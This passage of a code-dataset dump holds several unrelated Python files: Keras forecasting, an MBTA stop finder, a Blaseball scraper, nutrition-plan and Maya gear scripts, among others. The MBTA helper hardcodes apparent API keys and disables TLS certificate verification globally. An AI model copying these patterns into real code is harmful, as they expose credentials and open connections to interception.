beta_1=0.9, beta_2=0.999, epsilon=None, decay=1e-6, amsgrad=False)\nmodel.compile(loss='mean_squared_error', optimizer=adam, metrics=['MSE', 'MAE', 'MAPE'])\n\nif not args.visualize:\n model.fit(trainX,\n trainY,\n epochs=20,\n batch_size=1,\n verbose=1,\n validation_data=(testX, testY),\n callbacks=[checkpointer, csv_logger])\n\nmodel_path = os.path.join(os.path.dirname(__file__), 'checkpoint/{}/model.hdf5'.format(checkpoint_name))\nmodel.save(model_path)\n\n\"\"\"###Now check the predicted values for training and test data\"\"\"\n\n# make predictions\ntrainPredict = model.predict(trainX, batch_size=1)\ntestPredict = model.predict(testX, batch_size=1)\n\n# invert predictions\ntrainPredict = scaler.inverse_transform(trainPredict)\ntrainY = scaler.inverse_transform([trainY])\ntestPredict = scaler.inverse_transform(testPredict)\ntestY = scaler.inverse_transform([testY])\n\n# calculate root mean squared error\ntrainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))\nprint('Train Score: %.2f RMSE' % (trainScore))\ntestScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))\nprint('Test Score: %.2f RMSE' % (testScore))\n\n\n# shift train predictions for plotting\ntrainPredictPlot = numpy.empty_like(dataset)\ntrainPredictPlot[:, :] = numpy.nan\n# trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict\ntrainPredictPlot[:len(trainPredict), :] = trainPredict\n\n# shift test predictions for plotting\ntestPredictPlot = numpy.empty_like(dataset)\ntestPredictPlot[:, :] = numpy.nan\n# testPredictPlot[len(trainPredict)+(look_back*2)+1:len(dataset)-1, :] = testPredict\ntestPredictPlot[len(trainPredict)+2:len(trainPredict)+len(testPredict)+2, :] = testPredict\n\n\n\n\"\"\"Training Graphs\"\"\"\ndata = go.Scatter(\n x=pandas.DataFrame(scaler.inverse_transform(dataset)).index,\n y=pandas.DataFrame(scaler.inverse_transform(dataset))[0],\n name='Original Data'\n)\n\ntrain = go.Scatter(\n x=pandas.DataFrame(trainPredictPlot).index,\n y=pandas.DataFrame(trainPredictPlot)[0],\n name='Train Predict Data'\n)\n\ntest = go.Scatter(\n x=pandas.DataFrame(testPredictPlot).index,\n y=pandas.DataFrame(testPredictPlot)[0],\n name='Test Predict Data'\n)\n\ndata_plot = [data, train, test]\nfig = go.Figure(data=data_plot)\npy.plot(fig, filename=os.path.join(os.path.dirname(__file__), '../plots/{}.html'.format(checkpoint_name)))\n","sub_path":"prediction/price.keras.py","file_name":"price.keras.py","file_ext":"py","file_size_in_byte":6510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"205926283","text":"import urllib.request\nimport json\nfrom pprint import pprint\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\n# Useful URLs (you need to add the appropriate parameters for your requests)\nMAPQUEST_BASE_URL = \"http://www.mapquestapi.com/geocoding/v1/address\"\nMBTA_BASE_URL = \"https://api-v3.mbta.com/stops\"\n\n# Your API KEYS (you need to use your own keys - very long random characters)\nMAPQUEST_API_KEY = \"s8MaFUrVtApmTesoZ4efmGl5PrrPOQmZ\"\nMBTA_API_KEY = \"fe4b0d61891d43bfa69d756c33130954\"\n\n# A little bit of scaffolding if you want to use it\n\n\ndef get_json(url):\n \"\"\"\n Given a properly formatted URL for a JSON web API request, return\n a Python JSON object containing the response to that request.\n \"\"\"\n f = urllib.request.urlopen(url)\n response_text = f.read().decode('utf-8')\n response_data = json.loads(response_text)\n return response_data\n\n\ndef get_lat_long(place_name):\n \"\"\"\n Given a place name or address, return a (latitude, longitude) tuple\n with the coordinates of the given place.\n See https://developer.mapquest.com/documentation/geocoding-api/address/get/\n for Mapquest Geocoding API URL formatting requirements.\n \"\"\"\n place_name = str(place_name)\n place_name = place_name.replace(\" \", \"%20\")\n place_name = f\"{place_name},MA\"\n url = f'http://www.mapquestapi.com/geocoding/v1/address?key={MAPQUEST_API_KEY}&location={place_name}'\n json_data = get_json(url)\n coordinates = json_data[\"results\"][0][\"locations\"][0][\"latLng\"]\n latitude = coordinates[\"lat\"]\n longitude = coordinates[\"lng\"]\n return latitude, longitude\n\n\ndef get_nearest_station(latitude, longitude):\n \"\"\"\n Given latitude and longitude strings, return a (station_name, wheelchair_accessible)\n tuple for the nearest MBTA station to the given coordinates.\n See https://api-v3.mbta.com/docs/swagger/index.html#/Stop/ApiWeb_StopController_index for URL\n formatting requirements for the 'GET /stops' API.\n \"\"\"\n url = f\"https://api-v3.mbta.com/stops?api_key={MBTA_API_KEY}&sort=distance&filter%5Blatitude%5D={latitude}&filter%5Blongitude%5D={longitude}\"\n data = get_json(url)\n try:\n name = data[\"data\"][0][\"attributes\"][\"name\"]\n wheelchair_accessible = data[\"data\"][0][\"attributes\"][\"wheelchair_boarding\"]\n except:\n return \"MBTA Not Available\"\n if wheelchair_accessible == 0:\n wheelchair_accessible = \"No Information\"\n elif wheelchair_accessible == 1:\n wheelchair_accessible = \"Accessible\"\n else:\n wheelchair_accessible = \"Inaccessible\"\n return f\"Station: {name}, Wheelchair Accessibility: {wheelchair_accessible}\"\n\n\ndef find_stop_near(place_name):\n \"\"\"\n Given a place name or address, return the nearest MBTA stop and whether it is wheelchair accessible.\n \"\"\"\n location_data = get_lat_long(place_name)\n latitude = location_data[0]\n longitude = location_data[1]\n return get_nearest_station(latitude, longitude)\n\n\n\ndef main():\n \"\"\"\n You can test all the functions here\n \"\"\"\n place = str(input(\"Please enter your location: \"))\n print(find_stop_near(place))\n \n\nif __name__ == '__main__':\n main()","sub_path":"mbta_helper.py","file_name":"mbta_helper.py","file_ext":"py","file_size_in_byte":3181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"297787705","text":"import requests\nimport json\nfrom string import Template\n\nheaders = {\"User-Agent\": \"plostcards (chef#1911)\"}\nvalid_divisions = [\n # \"d4cc18de-a136-4271-84f1-32516be91a80\", # Wild High\n # \"456089f0-f338-4620-a014-9540868789c9\", # Mild High\n # \"98c92da4-0ea7-43be-bd75-c6150e184326\", # Wild Low\n # \"fadc9684-45b3-47a6-b647-3be3f0735a84\", # Mild Low\n \"3c34edad-4d24-40f4-b216-672d4dcbf70e\", # Vault\n \"045fb323-43ec-4114-8b74-4bc0927e5947\", # Hall\n \"5d80f2b8-9a4d-46af-af1c-f520ff59a5f3\", # Horizon\n \"7139575e-61d7-43f1-9b9e-6bf892cdce0f\", # Desert\n]\n\nprint(\"GET https://blaseball.com/database/simulationData\")\nsimData = requests.get(\n \"https://blaseball.com/database/simulationData\", headers=headers\n).json()\n# MOCK: simData = {\"season\": 22}\n\nprint(\"GET https://www.blaseball.com/database/season?number=\" + str(simData[\"season\"]))\nseasonData = requests.get(\n \"https://www.blaseball.com/database/season?number=\" + str(simData[\"season\"]),\n headers=headers,\n).json()\n\nprint(\"GET https://www.blaseball.com/database/playoffs?number=\" + str(simData[\"season\"]))\nplayoffsData = requests.get(\n \"https://www.blaseball.com/database/playoffs?number=\" + str(simData[\"season\"]),\n headers=headers,\n).json()\n\nprint(\"GET https://www.blaseball.com/database/standings?id=\" + seasonData[\"standings\"])\nstandingsData = requests.get(\n \"https://www.blaseball.com/database/standings?id=\" + seasonData[\"standings\"],\n headers=headers,\n).json()\n\nprint(\"GET https://www.blaseball.com/database/allTeams\")\nallTeamsData = requests.get(\n \"https://www.blaseball.com/database/allTeams\", headers=headers\n).json()\n\nprint(\"GET https://www.blaseball.com/database/allDivisions\")\ndivisionsData = requests.get(\n \"https://www.blaseball.com/database/allDivisions\", headers=headers\n).json()\n\nprint(\"GET https://www.blaseball.com/database/feed/global?&limit=20&sort=3\")\nfeedData = requests.get(\n \"https://www.blaseball.com/database/feed/global?&limit=20&sort=3\", headers=headers\n).json()\n\nteams = []\nfor t in allTeamsData:\n team = {}\n team[\"id\"] = t[\"id\"]\n team[\"location\"] = t[\"location\"]\n team[\"nickname\"] = t[\"nickname\"]\n team[\"fullName\"] = t[\"fullName\"]\n team[\"losses\"] = (\n standingsData[\"losses\"][t[\"id\"]] if t[\"id\"] in standingsData[\"losses\"] else 0\n )\n team[\"wins\"] = (\n standingsData[\"wins\"][t[\"id\"]] if t[\"id\"] in standingsData[\"wins\"] else 0\n )\n team[\"gamesPlayed\"] = (\n standingsData[\"gamesPlayed\"][t[\"id\"]]\n if t[\"id\"] in standingsData[\"gamesPlayed\"]\n else 0\n )\n team[\"emoji\"] = t[\"emoji\"]\n teams.append(team)\n\nprint(json.dumps(teams, indent=2))\n\ndivisions = []\nfor d_id in valid_divisions:\n d = [div for div in divisionsData if div[\"id\"] == d_id][0]\n division = {}\n division[\"name\"] = d[\"name\"]\n division[\"id\"] = d[\"id\"]\n division[\"teams\"] = [t for t in teams if t[\"id\"] in d[\"teams\"]]\n division[\"teams\"].sort(key=lambda x: x[\"wins\"], reverse=True)\n divisions.append(division)\n\nprint(json.dumps(divisions, indent=2))\n\nlatex_division = Template(\" \\\\multicolumn{2}{ c }{\\\\large{$name}} \\\\\\\\\\n\")\nlatex_standing = Template(\" $name & $wins ($games)\\\\\\\\\\n\")\nstandings = \"\"\nfor division in divisions:\n standings += \" \\\\begin{tabular}{ l c }\\n\"\n standings += latex_division.substitute(name=division[\"name\"])\n for team in division[\"teams\"]:\n standings += latex_standing.substitute(\n name=team[\"fullName\"],\n wins=team[\"wins\"],\n games=f\"{team['gamesPlayed']-team['losses']}-{team['losses']}\",\n )\n standings += \" \\\\end{tabular}\\n\"\n standings += \" \\\\vspace{8px}\\n\"\n\nlatex_feed = Template(\" S$season-$day & $description\\\\\\\\\")\nfeed = \"\"\nfor f in feedData:\n feed += latex_feed.substitute(season=f[\"season\"]+1, day=f[\"day\"]+1, description=f[\"description\"]).encode(\"ascii\", \"ignore\").decode(\"ascii\").replace(\"\\n\",\"\\\\\\\\\") + \"\\n\"\n \nplayoffs_winner = [team for team in teams if team[\"id\"] == playoffsData[\"winner\"]][0]\n\nwith open(\"sunday.template\", \"r\") as fd:\n template = fd.read()\n with open(\"sunday.tex\", \"w\") as wd:\n wd.write(Template(template).substitute(standings=standings, feed=feed, season=str(simData[\"season\"]+1), winner=playoffs_winner[\"fullName\"]))\n","sub_path":"sunday.py","file_name":"sunday.py","file_ext":"py","file_size_in_byte":4265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"194161519","text":"import xml.etree.ElementTree as ET\nimport sys\nimport nutrigenf\nimport nutrigen_gui\n# import os.path\n\n# default file input output folder\nstrBasePath = nutrigenf.getVar(\"basepath\")\n\n# get parameters\nprogram_name = sys.argv[0]\nparameters = sys.argv[1:]\nargCount = len(parameters)\n\n# check command line parameters\nif argCount == 0:\n nutrigenf.ngError(\"CIREQ\", \"None specified.\")\n quit()\n\nif argCount >= 1:\n # print (\"Plan file specified %s\" % (sys.argv[1]))\n strClientID= sys.argv[1]\n # strPlanFile = strBasePath + sys.argv[1] + \".xml\"\n\n # if os.path.isfile(strPlanFile) != True:\n # print (\"File not found - %s\" % strPlanFile)\n # quit()\n\n# open file\n# tree = ET.parse(strPlanFile)\n# doc = tree.getroot()\nstrXML = nutrigenf.getPendingPlanXML(strClientID)\nif strXML == None:\n nutrigenf.ngError(\"NOXML\", \"Please try compiling.\")\n quit()\n\ndoc = ET.fromstring(strXML)\n\n# declare\nintBCalories = 0\nintBQuantity = 0\nintLCalories = 0\nintLQuantity = 0\nintDCalories = 0\nintDQuantity = 0\nintSCalories = 0\nintSQuantity = 0\n\nfor items in doc:\n\n # at this level we'll find the 5 top level elements\n # meta rda-ai chart nutrients deficiencies\n\n # traverse meta container\n if items.tag == \"meta\":\n for meta in items:\n # in this, we'll find the time stamp, the session id and\n # the client subcontainer.\n if meta.tag == \"disclaimer\": strDisclaimer = meta.text\n if meta.tag == \"wantplantext\": strWantPlanText = meta.text\n if meta.tag == \"wantplanlink\": strWantPlanLink = meta.text\n if meta.tag == \"instructions\": strInstructions = meta.text\n\n if meta.tag == \"client\":\n for clientinfo in meta:\n # assign the text of various tags to variables\n if clientinfo.tag == \"name\": strClientName = clientinfo.text\n if clientinfo.tag == \"age\": strClientAge = clientinfo.text\n if clientinfo.tag == \"height\": fpClientHeight = float(clientinfo.text)\n if clientinfo.tag == \"weight\": fpClientWeight = float(clientinfo.text)\n if clientinfo.tag == \"mealtype\": strClientPlanType = clientinfo.text\n if clientinfo.tag == \"medical-issues\": strClientMI = clientinfo.text\n if clientinfo.tag == \"contraindications\": strClientCI = clientinfo.text\n if clientinfo.tag == \"bmr\": intClientBMR = int(float(clientinfo.text))\n if clientinfo.tag == \"bmi\": intClientBMI = int(float(clientinfo.text))\n if clientinfo.tag == \"age-range\": strClientAgeRange = clientinfo.text\n if clientinfo.tag == \"gender\": strClientGender = clientinfo.text\n if clientinfo.tag == \"bmi-category\": strClientBMICat = clientinfo.text\n if clientinfo.tag == \"recommended-calories\": intClientRecCalories = int(float(clientinfo.text))\n if clientinfo.tag == \"daily-water\": fpClientDailyWater = float(clientinfo.text)\n if clientinfo.tag == \"daily-fiber\": intClientDailyFiber = int(float(clientinfo.text))\n\n # traverse rda-ai tags\n if items.tag == \"rda-ai\":\n # in this we'll find various nutrient names and their values within\n # simple element containers.\n for nutrient in items:\n if nutrient.tag == \"vitamin-a\": rVitaminA = float(nutrient.text)\n if nutrient.tag == \"vitamin-c\": rVitaminC = float(nutrient.text)\n if nutrient.tag == \"vitamin-d\": rVitaminD = float(nutrient.text)\n if nutrient.tag == \"vitamin-e\": rVitaminE = float(nutrient.text)\n if nutrient.tag == \"vitamin-k\": rVitaminK = float(nutrient.text)\n if nutrient.tag == \"vitamin-b6\": rVitaminB6 = float(nutrient.text)\n if nutrient.tag == \"vitamin-b12\": rVitaminB12 = float(nutrient.text)\n if nutrient.tag == \"molybdenum\": rMolybdenum = float(nutrient.text)\n if nutrient.tag == \"manganese\": rManganese = float(nutrient.text)\n if nutrient.tag == \"magnesium\": rMagnesium = float(nutrient.text)\n if nutrient.tag == \"sodium\": rSodium = float(nutrient.text)\n if nutrient.tag == \"chloride\": rChloride= float(nutrient.text)\n if nutrient.tag == \"choline\": rCholine = float(nutrient.text)\n if nutrient.tag == \"biotin\": rBiotin = float(nutrient.text)\n if nutrient.tag == \"fluoride\": rFluoride = float(nutrient.text)\n if nutrient.tag == \"phosphorus\": rPhosphorus = float(nutrient.text)\n if nutrient.tag == \"selenium\": rSelenium = float(nutrient.text)\n if nutrient.tag == \"zinc\": rZinc = float(nutrient.text)\n if nutrient.tag == \"iodine\": rIodine= float(nutrient.text)\n if nutrient.tag == \"iron\": rIron = float(nutrient.text)\n if nutrient.tag == \"potassium\": rPotassium = float(nutrient.text)\n if nutrient.tag == \"folate\": rFolate = float(nutrient.text)\n if nutrient.tag == \"pantothenic-acid\": rPantothenicAcid = float(nutrient.text)\n if nutrient.tag == \"copper\": rCopper = float(nutrient.text)\n if nutrient.tag == \"chromium\": rChromium = float(nutrient.text)\n if nutrient.tag == \"riboflavin\": rRiboflavin = float(nutrient.text)\n if nutrient.tag == \"calcium\": rCalcium = float(nutrient.text)\n if nutrient.tag == \"niacin\": rNiacin = float(nutrient.text)\n if nutrient.tag == \"thiamin\": rThiamin = float(nutrient.text)\n\n # traverse chart element\n if items.tag == \"chart\":\n # this only contains multiple ITEM tags, each of which\n # contain details of a single item, across multiple sub tags\n for chart in items:\n if chart.tag == \"item\":\n for itemdetails in chart:\n if itemdetails.tag == \"code\": strItemCode = itemdetails.text\n if itemdetails.tag == \"name\": strItemName = itemdetails.text\n if itemdetails.tag == \"qty\": intItemQty = int(float(itemdetails.text))\n if itemdetails.tag == \"calories\": intItemCalories = int(float(itemdetails.text))\n\n # traverse nutrients contained in plan\n if items.tag == \"nutrients\":\n # this only contains multiple ITEM tags, each of which\n # contain details of a single item, across multiple sub tags\n for chart in items:\n if chart.tag == \"nutrient\":\n for itemdetails in chart:\n if itemdetails.tag == \"nutcode\": strNutCode = itemdetails.text\n if itemdetails.tag == \"nutname\": strNutName = itemdetails.text\n if itemdetails.tag == \"nutval\": fpNutQty = float(itemdetails.text)\n if itemdetails.tag == \"nutunit\": strNutUnit = itemdetails.text\n\n if strNutCode == \"208\": fpPlanEnergy = fpNutQty\n\n # traverse plan deficiencies\n strDeficiencies = \"\"\n if items.tag == \"deficiencies\":\n # in this we'll find various nutrient names and their values within\n # simple element containers.\n for defnuts in items:\n if defnuts.tag == \"def-nutrient\":\n strDeficiencies = strDeficiencies + defnuts.text + \\\n \" (\" + nutrigenf.getNutrientCode(defnuts.text) + \"), \"\n\n # remove trailing comma from deficiencies string\n strDeficiencies = strDeficiencies.strip()\n strDeficiencies = strDeficiencies[:-1]\n\n # write to PDF when done.\n\n# print stuff here\nstrClientInfo = \" %s \\n %s, %s yrs, %s cm, %s kg (%s:%s), %s \" % \\\n (strClientName, strClientGender, strClientAge, fpClientHeight, \\\n fpClientWeight, intClientBMI, strClientBMICat, strClientPlanType)\n\nintClientInfoLen = len(strClientInfo)\n\nstrCalorieInfo = \" BMR/Rec/Plan Calories: %s / %s / %s \" % (intClientBMR, intClientRecCalories, fpPlanEnergy)\nintCalorieInfoLen = len(strCalorieInfo)\nstrCalorieInfo = strCalorieInfo + (\" \" * (intClientInfoLen - intCalorieInfoLen))\n\nstrDefInfo = \" Deficiencies: %s \" % strDeficiencies\nintDefLen = len(strDefInfo)\n\n# put the list of deficiencies into a db variable for retrieval by\n# the deficiencies program for easier usage without scrolling\nnutrigenf.putVar(\"deficiencies-temp\", strDeficiencies, \"S\")\n\n# make the deficiencies fit properly\nintDefLen = intDefLen * 1.0\nintIterations = int(intDefLen / intClientInfoLen)\nfor i in range (1, intIterations+1):\n strDefInfo = nutrigenf.stringInsert(strDefInfo, \"\\r\\n \", intClientInfoLen * i)\n\n# make the counter indictions etc fit properly\nstrCI = \" Dis/CI: %s [MI: %s]\" % (strClientCI, strClientMI)\nintCILen = len(strCI)\nintCILen = intCILen * 1.0\nintIterations = int(intCILen / intClientInfoLen)\nfor i in range (1, intIterations+1):\n strCI = nutrigenf.stringInsert(strCI, \"\\r\\n \", intClientInfoLen * i)\n\ngui_mode = False\nif gui_mode == True:\n nutrigen_gui.plan_summary(strClientInfo, strCalorieInfo, strCI, strDefInfo)\n\nelse:\n print (\"\\033[37;46m\" + strClientInfo + \"\\033[0m\")\n print (\"\\033[37;45m\" + strCalorieInfo + \"\\033[0m\")\n # print (\"\\033[37;43m\" + strCI + \"\\033[0m\")\n print (\"\\033[37;44m\" + strDefInfo + \"\\033[0m\")\n\n# change terminal size so plans can be seen/worked on comfortably\nif gui_mode == False:\n sys.stdout.write(\"\\x1b[8;{rows};{cols}t\".format(rows=48, cols=intClientInfoLen + 5))\n\nquit()\n","sub_path":"plansummary.py","file_name":"plansummary.py","file_ext":"py","file_size_in_byte":9452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"13195095","text":"#\n# Copyright (c) 2016, Prometheus Research, LLC\n#\n\nfrom webob.exc import HTTPBadRequest\n\nfrom rex.core import StrVal, MaybeVal\nfrom rex.instrument import Entry, ParameterSupplier, InstrumentError\nfrom rex.forms import PresentationAdaptor\nfrom rex.widget import Field, responder, RequestURL\n\nfrom .base import AcquireEntityAction\n\n\n__all__ = (\n 'ReconcileTaskAction',\n)\n\n\nclass ReconcileTaskAction(AcquireEntityAction):\n name = 'task-reconcile'\n js_type = 'rex-acquire-actions', 'ReconcileTask'\n\n initial_channel = Field(\n MaybeVal(StrVal()),\n default=None,\n doc='The default channel to use when determining which Form to use to'\n ' display the Reconciler.',\n )\n\n def context(self):\n return (\n self.domain.record(self.entity),\n self.domain.record(),\n )\n\n @responder(url_type=RequestURL)\n def display_data(self, request):\n user = self.get_user(request)\n data = {\n 'task': {},\n 'instrument': {},\n 'forms': {},\n 'discrepancies': {},\n 'entries': [],\n 'parameters': {},\n }\n\n # Get the Task\n task_id = request.GET.get('task_id')\n if not task_id:\n raise HTTPBadRequest('Must specify task_id')\n task = user.get_object_by_uid(task_id, 'task')\n if not task:\n data['error'] = 'TASK_NOT_FOUND'\n return self.response_as_json(data)\n if not task.can_reconcile:\n data['error'] = 'CANT_RECONCILE'\n return self.response_as_json(data)\n data['task'] = task.as_dict()\n\n data['discrepancies'] = task.get_discrepancies()\n if not data['discrepancies']:\n data['error'] = 'NO_DISCREPANCIES'\n return self.response_as_json(data)\n\n data['instrument'] = task.assessment.instrument_version.definition\n data['parameters'] = ParameterSupplier.get_task_parameters(task)\n data['entries'] = [\n entry.as_dict()\n for entry in\n task.get_entries(type=Entry.TYPE_PRELIMINARY)\n ]\n\n # Find the Forms that can be used\n forms = user.find_objects(\n 'form',\n 'forms',\n instrument_version=task.assessment.instrument_version,\n )\n if not forms:\n try:\n import rex.mobile\n except ImportError:\n pass\n else:\n try:\n interactions = user.find_objects(\n 'interaction',\n 'mobile',\n instrument_version=task.assessment.instrument_version,\n )\n except NotImplementedError:\n pass\n else:\n for interaction in interactions:\n # Forcefully duck-type the Interaction into a Form\n interaction.adapted_configuration = \\\n PresentationAdaptor.adapt_form(\n interaction.channel,\n interaction.instrument_version.definition,\n interaction.form_configuration,\n )\n forms = interactions\n if not forms:\n data['error'] = 'NO_FORMS'\n else:\n data['forms'] = dict(\n [(f.channel.uid, f.adapted_configuration) for f in forms]\n )\n\n return self.response_as_json(data)\n\n @responder(url_type=RequestURL)\n def reconcile_task(self, request):\n task_id = request.json.get('task_id')\n solution = request.json.get('data')\n if not task_id or not solution:\n raise HTTPBadRequest(\n 'Must specify both task_id and data',\n )\n\n user = self.get_user(request)\n task = user.get_object_by_uid(task_id, 'task')\n if not task:\n raise HTTPBadRequest(\n 'Specified task_id does not exist',\n )\n if not task.can_reconcile:\n response = {\n 'status': 'ERROR',\n 'details': 'Cannot reconcile specified task_id',\n }\n\n else:\n try:\n task.reconcile(user, solution)\n except InstrumentError as exc:\n response = {\n 'status': 'ERROR',\n 'details': exc.message,\n }\n else:\n response = {\n 'status': 'SUCCESS',\n }\n\n return self.response_as_json(response)\n\n","sub_path":"src/rex.acquire_actions/src/rex/acquire_actions/reconcile_task.py","file_name":"reconcile_task.py","file_ext":"py","file_size_in_byte":4652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"83148110","text":"import pandas as pd\nfrom matplotlib.pyplot import imread\nimport glob\nfrom mxnet import gluon\nimport numpy as np\nimport os\n\nfrom mxnet.gluon.data import dataset\nimport warnings\nfrom mxnet import image\n\n\ndef get_list_dir_in_folder(dir):\n sub_dir = [o for o in os.listdir(dir) if os.path.isdir(os.path.join(dir, o))]\n return sub_dir\n\ndef get_list_file_in_folder(dir, ext='jpg'):\n included_extensions = [ext]\n file_names = [fn for fn in os.listdir(dir)\n if any(fn.endswith(ext) for ext in included_extensions)]\n return file_names\n\ndef create_class_folder_inside_dir(dir, num_class=103):\n for i in range(num_class):\n class_dir=os.path.join(dir,str(i))\n if not os.path.exists(class_dir):\n os.makedirs(class_dir)\n\ndef get_string_from_file(file_path):\n text = [line.rstrip('\\n') for line in open(file_path)]\n return text\n\nclass ImageFolderDatasetCustomized(dataset.Dataset):\n \"\"\"A dataset for loading image files stored in a folder structure.\n\n like::\n\n root/car/0001.jpg\n root/car/xxxa.jpg\n root/car/yyyb.jpg\n root/bus/123.jpg\n root/bus/023.jpg\n root/bus/wwww.jpg\n\n Parameters\n ----------\n root : str\n Path to root directory.\n flag : {0, 1}, default 1\n If 0, always convert loaded images to greyscale (1 channel).\n If 1, always convert loaded images to colored (3 channels).\n transform : callable, default None\n A function that takes data and label and transforms them::\n\n transform = lambda data, label: (data.astype(np.float32)/255, label)\n\n Attributes\n ----------\n synsets : list\n List of class names. `synsets[i]` is the name for the integer label `i`\n items : list of tuples\n List of all images in (filename, label) pairs.\n \"\"\"\n def __init__(self, root, flag=1, transform=None, sub_class_inside=True):\n self._root = os.path.expanduser(root)\n self._flag = flag\n self._transform = transform\n self._exts = ['.jpg', '.jpeg', '.png']\n self._sub_class = sub_class_inside\n self._list_images(self._root)\n\n def _list_images(self, root):\n self.synsets = []\n self.items = []\n\n if(self._sub_class):\n class_dirs = os.listdir(root)\n try:\n class_dirs.sort(key=int)\n except ValueError:\n class_dirs = sorted(os.listdir(root))\n pass\n\n for folder in class_dirs:\n path = os.path.join(root, folder)\n if not os.path.isdir(path):\n warnings.warn('Ignoring %s, which is not a directory.' % path, stacklevel=3)\n continue\n label = len(self.synsets)\n self.synsets.append(folder)\n for filename in sorted(os.listdir(path)):\n filename = os.path.join(path, filename)\n ext = os.path.splitext(filename)[1]\n if ext.lower() not in self._exts:\n warnings.warn('Ignoring %s of type %s. Only support %s' % (\n filename, ext, ', '.join(self._exts)))\n continue\n self.items.append((filename, label))\n else:\n for filename in sorted(os.listdir(root)):\n raw_name=(os.path.splitext(filename)[0]).split('_')\n length=len(raw_name)\n name_wo_ext = int(raw_name[length-1])\n filename = os.path.join(root, filename)\n ext = os.path.splitext(filename)[1]\n if ext.lower() not in self._exts:\n warnings.warn('Ignoring %s of type %s. Only support %s' % (\n filename, ext, ', '.join(self._exts)))\n continue\n self.items.append((filename, name_wo_ext))\n\n\n def __getitem__(self, idx):\n img = image.imread(self.items[idx][0], self._flag)\n label = self.items[idx][1]\n if self._transform is not None:\n return self._transform(img, label)\n if(self._sub_class):\n name = os.path.basename(self.items[idx][0])\n raw_name = (os.path.splitext(name)[0]).split('_')\n length = len(raw_name)\n name_wo_ext = int(raw_name[length - 1])\n return img, label, name_wo_ext\n else:\n return img, self.items[idx][1]\n\n def __len__(self):\n return len(self.items)\n","sub_path":"scripts/classification/arm_project/utils_classification.py","file_name":"utils_classification.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"478829447","text":"from threading import Thread,Lock\nfrom time import sleep\nimport sys,os\nip=1\na=0\ndef fun1(ips):\n os.system(\"./thread_c_prog ifconfig >ipcon/de\"+str(ips)+\".txt\")\nthreads=[]\nfor i in range(0,10000):\n threads.append(Thread(target=fun1,args=(i,)))\nfor j in threads:\n j.start()\nfor t in threads:\n t.join()\n","sub_path":"c_with_thread.py","file_name":"c_with_thread.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"577872080","text":"import maya.cmds as cmds\n\n\"\"\"\n# Using: Maya API 1.0, Python 2.7.11 \n# Author: Timothy Stoltzner Rasmussen\n\"\"\"\n\n\nclass Gear(object):\n\n standard_length = None\n standard_teeth = None\n\n def __init__(self, standard_teeth=10, standard_length=0.3):\n \"\"\"\n To use the gear class you need to assign the teeth amount and the length.\n It will otherwise use the standard defined values.\n\n :param standard_teeth: Amount of gear teeth\n :param standard_length: The length of the teeth\n \"\"\"\n self.standard_teeth = standard_teeth\n self.standard_length = standard_length\n self.spans = standard_teeth * 2\n self.shape = None\n self.transform = None\n self.constructor = None\n self.extrude = None\n\n def create(self):\n\n self.create_pipe()\n\n self.make_teeth()\n\n def create_pipe(self):\n # Setting the shape and transform to the class variables\n self.transform, self.shape = cmds.polyPipe(subdivisionsAxis=self.spans)\n\n # Finding the polyPipe node and set it equal to the constructor\n for node in cmds.listConnections(\"{0}.inMesh\".format(self.transform)):\n if cmds.objectType(node) == \"polyPipe\":\n self.constructor = node\n break\n\n def make_teeth(self):\n # Clearing the selection to ensure, selection is clean.\n cmds.select(clear=True)\n\n # Creating a list to select all the faces that will become the teeth.\n # This will return a list of numbers in the range spans * 2 to spans * 3, with steps of 2.\n side_faces = self.get_teeth_faces(self.standard_teeth)\n\n # Looping through the faces in the list of side_faces\n for face in side_faces:\n # The '%s.f[%s]' expands to something like pPipe1.f[20]\n # ADD selecting the wanted faces on the created polygonPipe.\n cmds.select(\"{0}.{1}\".format(self.transform, face), add=True)\n\n # Instead of returning a value, the extrude note will be stored onto the class\n # as a class variable\n self.extrude = cmds.polyExtrudeFacet(localTranslateZ=self.standard_length)[0]\n cmds.select(clear=True)\n\n def change_length(self, length=standard_length):\n # Because the extrude node is on the class, I can get it directly\n # By doing it like this, Maya don't need to tell what extrude note to change.\n cmds.polyExtrudeFacet(self.extrude, edit=True, ltz=length)\n\n def change_teeth(self, teeth=standard_teeth, length=standard_length):\n # By knowing what constructor is used within maya, I refer to it directly\n cmds.polyPipe(self.constructor, edit=True, sa=teeth * 2)\n # Calling modify_extrude directly\n self.modify_extrude(teeth, length)\n\n def get_teeth_faces(self, teeth=standard_teeth):\n\n spans = teeth * 2\n # Creating a list to select all the faces that will become the teeth.\n # This will return a list of numbers in the range spans * 2 to spans * 3, with steps of 2.\n side_faces = range(spans * 2, spans * 3, 2)\n\n # The list for collecting the faces\n faces = []\n\n for face in side_faces:\n faces.append(\"f[{0}]\".format(face))\n\n return faces\n\n def modify_extrude(self, teeth=standard_teeth, length=standard_length):\n faces = self.get_teeth_faces(teeth)\n\n # The extrude node has an attribute called inputComponents\n # To change it I use a simple SetAttr call instead of recreating the extrude which can be expensive\n # Read this as:\n # cmds.setAttr('extrudeNode.inputComponents', 2, 'f[1]', 'f[2]', type='componentList'\n # *args = [] = face1, face2, face3\n\n cmds.setAttr(\"{0}.inputComponents\".format(self.extrude), len(faces), *faces, type=\"componentList\")\n\n self.change_length(length)\n\n\nmy_gear1 = Gear()\nmy_gear1.create()\nmy_gear1.change_teeth(30, 